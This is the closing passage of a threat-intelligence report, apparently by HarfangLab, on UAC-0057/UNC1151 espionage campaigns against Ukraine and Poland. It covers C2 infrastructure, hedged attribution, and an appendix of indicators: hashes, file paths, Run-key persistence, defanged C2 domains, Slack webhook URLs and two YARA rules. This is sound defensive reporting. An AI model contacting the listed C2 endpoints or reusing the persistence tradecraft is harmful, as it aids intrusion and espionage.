URL:\r\nhxxps://cdn1.sweetgeorgiayarns[.]com/wp-content/uploads/2025/04/06102226/Kims-hand-cards.jpg . We observe that\r\nthe path /wp-content/uploads/2025/04/06102226/Kims-hand-cards.jpg has been reproduced by the threat actor in the C2\r\nURL.\r\nSimilarly, the SDXHelp.dll sample that we associated with a campaign targeting Poland has the following C2 URL:\r\nhxxps://taskandpurpose[.]icu/hews/coast-guard-0reg0n-c0ncrete.jpg . In this case, the URL path is slightly different\r\nfrom the one on the legitimate website as news became hews , and the name of the JPEG file was derived from the last\r\npart of the path: hxxps://taskandpurpose[.]com/news/coast-guard-oregon-concrete/ . Also, the displayed image (SHA-256 b39411abe494e2b04419a32c72fb1968ba745b3d7b04e9e8ebbab872df794b35 ) has been taken from an online commercial\r\nimage library, and it does not appear to be associated with any of the content of the legitimate website.\r\nSlack teams\r\nOther first stage samples that we associate with a campaign targeting Poland use Slack as a C2 channel. Associated Slack\r\nteams IDs appear to match Slack “free subscription” offer (they are not associated with an enterprise account):\r\nSlack team ID Account/Workspace name Creation date\r\nT08NWSF1L78 Cakybo 2025-04-22 12:38:42 UTC\r\nT08N1F1F64W Fbfubao 2025-04-15 15:01:17 UTC\r\nTargets\r\nThe first set of archives described in this report has been uploaded to an online multiscanner service from Ukraine, and\r\ncontains files which names and contents are in Ukrainian, including a decoy document pertaining to Ukrainian public\r\nservices.\r\nOther files referenced in this report (archives and XLS spreadsheets) were uploaded from Poland, and some of them contain\r\nfile names in Polish. In one instance, a decoy document related to the Union of Rural Municipalities of the Republic of\r\nPoland has been identified.\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 15 of 20\n\nDue to our limited visibility, and without any additional information about the context in which these archives or documents\r\nhave been delivered, we cannot precisely identify the targets of these campaigns, but we believe that organisations or\r\nindividuals in Ukraine and in Poland were the intended targets.\r\nFigure 9 – Map of targeted countries\r\nAttribution: similarities with reported UAC-0057 activity\r\nOur observations regarding the tools and techniques used by the threat actor, the supporting infrastructure, as well as the\r\ntargeting of Ukraine and Poland led us to consider an attribution of reported activities to UAC-0057 (also known as\r\nUNC1151, FrostyNeighbor or GhostWriter), a cyber espionage threat actor with reported ties to the Belarusian government.\r\nIn recent years, the use of weaponized XLS spreadsheets containing obfuscated VBA macros aiming to drop a first stage\r\nDLL downloader, as well as implant loading mechanisms similar to what we described, have been documented in several\r\nreports associated with UNC1151. In a blog post from February 2025, SentinelOne described the use of XLS spreadsheets\r\ncontaining VBA macros obfuscated with MacroPack and simple C# downloaders in a campaign targeting Ukrainian military\r\nand government organisations as well as Belarusian government opposition that they attribute to Ghostwriter. In addition,\r\none of the C++ downloader we identified seems to be a variant of the same malware described in a blog post pertaining to\r\nanother infection chain likely associated with FrostyNeighbor.\r\nRegarding the infrastructure, we observed similar setups as previously reported about UNC1151: domains registered at\r\nPublicDomainRegistry, the use of Cloudflare nameservers, C2 URLs mimicking existing legitimate content and serving an\r\nimage to visiting web clients. Keeping in mind that we only have a limited visibility on the threat actor’s operations, it\r\nappears that the latter transitioned from the extensive use of top-level domains such as .shop in 2024 to the .icu and .online\r\nTLDs in more recent campaigns.\r\nOver the years, multiple publications have highlighted the targeting of Ukraine and Poland by UNC1151. Recently, on June\r\n5, 2025, CERT Polska attributed a campaign targeting instances of Roundcube vulnerable to CVE-2024-42009 to UNC1151.\r\nSince 2022, CERT-UA made several publications about UAC-0057, notably reporting about a surge of activity of the threat\r\nactor during the summer of 2024.\r\nAs outlined in this section, we observed noticeable similarities with activity attributed by other vendors or governmental\r\norganisations to UNC1151, Ghostwriter, FrostyNeighbor or UAC-0057. However, due to our limited visibility on current\r\nand past operations of UAC-0057, it would not be reasonable to attribute the described activities with high confidence.\r\nConclusion: minor evolutions to disciplined targeting\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 16 of 20\n\nOur investigation highlights multiple similarities and overlaps in tooling and infrastructure that are used in the described\r\nintrusion campaigns. We further determined that the techniques, supporting infrastructure and targeting all align with\r\npublicly reported activities that are associated with UAC-0057.\r\nCompared to previously reported facts, and although many techniques remain unchanged, we observed some evolution of\r\nUAC-0057’s toolset and practices, including the use of Slack for some C2 communication, as well as a transition to other\r\ntop-level domains to support their C2 infrastructure. These minor changes suggest that UAC-0057 may be exploring\r\nalternatives, in a likely attempt to work around detection, but prioritizes the continuity or development of its operations over\r\nstealthiness and sophistication.\r\nAs it has been demonstrated by previous reporting over the years, UAC-0057 has consistently been targeting Ukraine and\r\nPoland among other neighboring countries, and we expect to observe similar activity directed towards Ukrainian and Polish\r\norganisations or individuals in the future with a possible extension to some other countries in Europe.\r\nAppendix: indicators and detection rules\r\nIndicators of compromise (IOCs)\r\nAssociated IOCs are also available on our GitHub repository.\r\nHashes (SHA-256)\r\n5df1e1d67b92e2bba8641561af9967e3a54ec73600283c66b09c8165ddcb7de9|Archive, campaign targeting Ukraine, July 2025\r\n699c50014cdbe919855c25eb35b15dfc8e64f73945187da41d985a9d7be31a71|Archive, campaign targeting Ukraine, July 2025\r\n26ea842c4259c90349a1f4db92efa89ac4429a5ff380e7f72574426cfd647f1a|Archive, campaign targeting Ukraine, June 2025\r\n6e562afa3193c2ca5d2982e04de78cf83faa203534a6098ab5f08df94bbeb944|Archive, campaign targeting Poland, May 2025\r\n3fff6c8a8ef3f153ebbe6d469a0d970953358a25bb9b4955a2592626f011cbd6|Archive, campaign targeting Poland, May 2025\r\n730c1a02bb31d548d91ba23fce870b1dc53c4802ea4fcb0d293f96de670d74af|Archive, campaign targeting Poland, April 2025\r\n57e0280dc5b769186588cc3a27a8a9be6f6e169551bbef39f95127e9326627f2|Archive, campaign targeting Poland, April 2025\r\nf6fec3722a8c98c29c5de10969b8f70962dbb47ba53dcbcd4a3bbc63996d258d|XLS spreadsheet, campaign targeting Ukraine, July 2025\r\ndeaa3f807de097c3bfff37a41e97af5091b2df0e3a6d01a11a206732f9c6e49c|XLS spreadsheet, campaign targeting Ukraine, July 2025\r\naac430127c438224ec61a6c02ea59eb3308eb54297daac985a7b26a75485e55f|XLS spreadsheet, campaign targeting Ukraine, June 2025\r\n06380c593d122fc4987e9d4559a9573a74803455809e89dd04d476870a427cbe|XLS spreadsheet, campaign targeting Poland, May 2025\r\n082877e6f8b28f6cf96d3498067b0c404351847444ebc9b886054f96d85d55d4|XLS spreadsheet, campaign targeting Poland, May 2025\r\n082903a8bec2b0ef7c7df3e75871e70c996edcca70802d100c7f68414811c804|XLS spreadsheet, campaign targeting Poland, April 2025\r\n69636ddc0b263c93f10b00000c230434febbd49ecdddf5af6448449ea3a85175|XLS spreadsheet, campaign targeting Poland, April 2025\r\na2a2f0281eed6ec758130d2f2b2b5d4f578ac90605f7e16a07428316c9f6424e|DLL, campaign targeting Ukraine, July 2025\r\n8a057d88a391a89489697634580e43dbb14ef8ab1720cb9971acc418b1a43564|DLL, campaign targeting Ukraine, July 2025\r\n707a24070bd99ba545a4b8bab6a056500763a1ce7289305654eaa3132c7cbd36|DLL, campaign targeting Ukraine, June 2025\r\n5fa19aa32776b6ab45a99a851746fbe189f7a668daf82f3965225c1a2f8b9d36|DLL, campaign targeting Poland, May 2025\r\n3b5980c758bd61abaa4422692620104a81eefbf151361a1d8afe8e89bf38579d|DLL, campaign targeting Poland, May 2025\r\nc7e44bba26c9a57d8d0fa64a140d58f89d42fd95638b8e09bc0d2020424b640e|DLL, campaign targeting Poland, May 2025\r\n7c77d1ba7046a4b47aec8ec0f2a5f55c73073a026793ca986af22bbf38dc948c|DLL, campaign targeting Poland, April 2025\r\n559ee2fad8d16ecaa7be398022aa7aa1adbd8f8f882a34d934be9f90f6dcb90b|DLL, campaign targeting Poland, April 2025\r\nFile paths\r\n%TEMP%\\DefenderProtectionScope.log|C# downloader, campaign targeting Ukraine, June 2025\r\n%APPDATA%\\Microsoft\\System\\ProtectedCertSystem.dll|Unknown next stage, campaign targeting Ukraine, June 2025\r\n%LOCALAPPDATA%\\Serv\\0x00bac729fe.log|C# downloader, campaign targeting Ukraine, July 2025\r\n%APPDATA%\\Microsoft\\Windows\\Protection overview.lnk|LNK file used to load the C# downloader, campaign targeting Ukraine, J\r\n%APPDATA%\\Local\\Temp\\sdw9gobh0n|Microsoft Cabinet file containing the C# downloader, campaign targeting Ukraine, July 2025\r\n%APPDATA%\\Microsoft\\Windows\\Protection overview past.lnk|LNK file used to extract the C# downloader, campaign targeting Uk\r\n%LOCALAPPDATA%\\Logs\\sdw9gobh0n.log|C# downloader, campaign targeting Ukraine, July 2025\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 17 of 20\n\n%APPDATA%\\Microsoft\\Windows\\Protection overview.lnk|LNK file used to load the C# downloader, campaign targeting Ukraine, J\r\n%LOCALAPPDATA%\\SDXHelp\\SDXHelp.dll|C++ downloader, campaign targeting Poland, May 2025\r\n%LOCALAPPDATA%\\Runtime\\RuntimeBroker.dll|Unknown next stage, campaign targeting Poland, May 2025\r\n%APPDATA%\\Microsoft\\Windows\\Protection overview.lnk|LNK file used to load the C++ dropper, campaign targeting Poland, May\r\n%LOCALAPPDATA\\MSDE\\mrasp86.dll|C++ dropper, campaign targeting Poland, May 2025\r\n%APPDATA%\\DiagnosticComponents\\DiagnosticComponents.dll|C++ loader (Cobalt Strike beacon), campaign targeting Poland, May\r\n%PROGRAMDATA%\\OfficeRuntimeBroker.xlam|Microsoft Cabinet file containing the C# downloader, campaign targeting Poland, Apr\r\n%PROGRAMDATA%\\OfficeRuntimeBroker.lnk|LNK file used to extract and to load the C# downloader, campaign targeting Poland, A\r\n%PROGRAMDATA%\\~OfficeRuntimeBroker.dat|C# downloader, campaign targeting Poland, April 2025\r\nC:\\ProgramData\\ssh\\ssh.pif.pif.pif|Next stage, campaign targeting Poland, April 2025\r\n%PROGRAMDATA%\\~DF20BC61C6277A354A.xlam|Microsoft Cabinet file containing the C# downloader, campaign targeting Poland, Apr\r\n%PROGRAMDATA%\\~DF20BC61C6277A354A.lnk|LNK file used to extract and to load the C# downloader, campaign targeting Poland, A\r\n%PROGRAMDATA%\\~DF20BC61C6277A354A.dat|C# downloader, campaign targeting Poland, April 2025\r\nC:\\ProgramData\\WRDSPT\\wrdspt.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.pif.p\r\nPersistence artifacts\r\nRegistry keys\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SytemProtectionService|DefenderProtectionScope.log, downloader persist\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\MicrosoftDefender|Next stage implant (set by DefenderProtectionScope.lo\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SytemProtectService|0x00bac729fe.log, downloader persistence, campaign\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Audio Driver|sdw9gobh0n.log, downloader persistence, campaign targeting\r\nScheduled tasks names\r\n\\UpdateSDX|SDXHelp.dll, downloader persistence, campaign targeting Poland, May 2025\r\n\\ExpDiagnosticDataSettings|DiagnosticComponents.dll,next stage persistence, campaign targeting Poland, May 2025\r\nDomains\r\nsweetgeorgiayarns[.]online|C2 domain, campaign targeting Ukraine, July 2025\r\nkitchengardenseeds[.]icu|C2 domain, campaign targeting Ukraine, July 2025\r\npunandjokes[.]icu|C2 domain, campaign targeting Ukraine, June 2025\r\ntaskandpurpose[.]icu|C2 domain, campaign targeting Poland, May 2025\r\nmedpagetoday[.]icu|C2 domain, campaign targeting Poland, May 2025\r\npesthacks[.]icu|C2 domain, campaign targeting Poland, April 2025\r\nPossibly related domains\r\ncurseforge[.]icu|Low confidence\r\nURLs\r\nhxxps://sweetgeorgiayarns[.]online/wp-content/uploads/2025/04/06102226/Kims-hand-cards.jpg|C2 URL, campaign targeting Ukr\r\nhxxps://kitchengardenseeds[.]icu/seed-index/flowers/habitat-gardens.jpg|C2 URL, campaign targeting Ukraine, July 2025\r\nhxxps://punandjokes[.]icu/cannabis-jokes.jpg|C2 URL, campaign targeting Ukraine, June 2025\r\nhxxps://taskandpurpose[.]icu/hews/coast-guard-0reg0n-c0ncrete.jpg|C2 URL, campaign targeting Poland, May 2025\r\nhxxps://medpagetoday[.]icu/nicheediting/trends|C2 URL, campaign targeting Poland, May 2025\r\nhxxps://hooks.slack[.]com/services/T08NWSF1L78/B08P91RQ1EW/ZQzZ7IvlT81VpQijneCR0iYa|C2 URL (Slack webhook), campaign targe\r\nhxxps://files.slack[.]com/files-pri/T08NWSF1L78-F08NQETU5M5/owjomlhoms.jpg|C2 URL (Slack), campaign targeting Poland, Apri\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 18 of 20\n\nhxxps://hooks.slack[.]com/services/T08N1F1F64W/B08N1FMAN94/2QGu5K7wE3k6cVQ448Qa9n4W|C2 URL (Slack webhook), campaign targe\r\nhxxps://files.slack[.]com/files-pri/T08N1F1F64W-F08P2HJNU2F/ocnijrarcjvzenxyqhztf.jpg|C2 URL (Slack), campaign targeting P\r\nYARA rules\r\nrule trr250801_csharp_downloader_combined {\r\n meta:\r\n description = \"Detects C# downloaders as likely leveraged by UNC1151, and observed between May and July 2025\"\r\n references = \"TRR250801\"\r\n hash = \"559ee2fad8d16ecaa7be398022aa7aa1adbd8f8f882a34d934be9f90f6dcb90b\"\r\n hash = \"a2a2f0281eed6ec758130d2f2b2b5d4f578ac90605f7e16a07428316c9f6424e\"\r\n date = \"2025-08-08\"\r\n author = \"HarfangLab\"\r\n context = \"file\"\r\n strings:\r\n $dotNet = \".NETFramework,Version=\" ascii\r\n $a1 = \"set_SecurityProtocol\" ascii fullword\r\n $a2 = \"SecurityProtocolType\" ascii fullword\r\n $a3 = \"ManagementObjectSearcher\" ascii fullword\r\n $a4 = \"WebClient\" ascii fullword\r\n $a5 = \"DownloadString\" ascii fullword\r\n $a6 = \"get_Headers\" ascii fullword\r\n $a7 = \"StringBuilder\" ascii fullword\r\n $a8 = \"kernel32.dll\" ascii fullword\r\n $a9 = \"VirtualProtect\" ascii fullword\r\n $a10 = \"GetHINSTANCE\" ascii fullword\r\n $a11 = \"get_FullyQualifiedName\" ascii fullword\r\n $a12 = \"Marshal\" ascii fullword\r\n $a13 = \"get_OSVersion\" ascii fullword\r\n $a14 = \"get_MachineName\" ascii fullword\r\n $a15 = \"CreateDirectory\" ascii fullword\r\n $a16 = \"ToBase64String\" ascii fullword\r\n $a17 = { 00 20C03F0000 28 } // nop, ldc.i4 0x00003FC0, call (TLS config)\r\n condition:\r\n filesize \u003c 100KB and filesize \u003e 10KB\r\n and (uint16be(0) == 0x4D5A)\r\n and $dotNet\r\n and (all of ($a*))\r\n}\r\nrule trr250801_cpp_downloader {\r\n meta:\r\n description = \"Detects C++ downloaders as likely leveraged by UNC1151, and observed during May 2025\"\r\n references = \"TRR250801\"\r\n hash = \"5fa19aa32776b6ab45a99a851746fbe189f7a668daf82f3965225c1a2f8b9d36\"\r\n date = \"2025-08-08\"\r\n author = \"HarfangLab\"\r\n context = \"file\"\r\n strings:\r\n $u = { 00 60 be 00 ?? ?? 00 8d be 00 ?? ?? ff 57 83 cd ff eb 10 90 90 90 90 90 90 8a 06 46 88 07 47 01 db 75 07 8b\r\n $s0 = \"RTW0\" fullword\r\n $s1 = \"RTW1\" fullword\r\n $s2 = \"RTW2\" fullword\r\n $e = \"Start\" fullword\r\n condition:\r\n uint16be(0) == 0x4D5A and\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 19 of 20\n\nfilesize \u003c 1MB and\r\n $u and\r\n 2 of ($s*) and\r\n $e\r\n}\r\nSource: https://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nhttps://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://harfanglab.io/insidethelab/uac-0057-pressure-ukraine-poland/" ], "report_names": [ "uac-0057-pressure-ukraine-poland" ], "threat_actors": [ { "id": "f29188d8-2750-4099-9199-09a516c58314", "created_at": "2025-08-07T02:03:25.068489Z", "updated_at": "2026-04-10T02:00:03.827361Z", "deleted_at": null, "main_name": "MOONSCAPE", "aliases": [ "TA445 ", "UAC-0051 ", "UNC1151 " ], "source_name": "Secureworks:MOONSCAPE", "tools": [], "source_id": "Secureworks", "reports": null }, { "id": "119c8bea-816e-4799-942b-ff375026671e", "created_at": "2022-10-25T16:07:23.957309Z", "updated_at": "2026-04-10T02:00:04.807212Z", "deleted_at": null, "main_name": "Operation Ghostwriter", "aliases": [ "DEV-0257", "Operation Asylum Ambuscade", "PUSHCHA", "Storm-0257", "TA445", "UAC-0051", "UAC-0057", "UNC1151", "White Lynx" ], "source_name": "ETDA:Operation Ghostwriter", "tools": [ "Agentemis", "Cobalt Strike", "CobaltStrike", "HALFSHELL", "Impacket", "RADIOSTAR", "VIDEOKILLER", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "8a33d3ac-14ba-441c-92c1-39975e9e1a73", "created_at": "2023-01-06T13:46:39.195689Z", "updated_at": "2026-04-10T02:00:03.243054Z", "deleted_at": null, "main_name": "Ghostwriter", "aliases": [ "UAC-0057", "UNC1151", "TA445", "PUSHCHA", "Storm-0257", "DEV-0257" ], "source_name": "MISPGALAXY:Ghostwriter", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9e069b33-a19b-4b12-858c-244e5cf404ee", "created_at": "2024-11-13T13:15:31.111132Z", "updated_at": "2026-04-10T02:00:03.757257Z", "deleted_at": null, "main_name": "FrostyNeighbor", "aliases": [], "source_name": "MISPGALAXY:FrostyNeighbor", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434396, "ts_updated_at": 1775792110, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/075c05d08e575ac604b3f9bd89a7c79d0989be72.pdf", "text": "https://archive.orkl.eu/075c05d08e575ac604b3f9bd89a7c79d0989be72.txt", "img": "https://archive.orkl.eu/075c05d08e575ac604b3f9bd89a7c79d0989be72.jpg" } }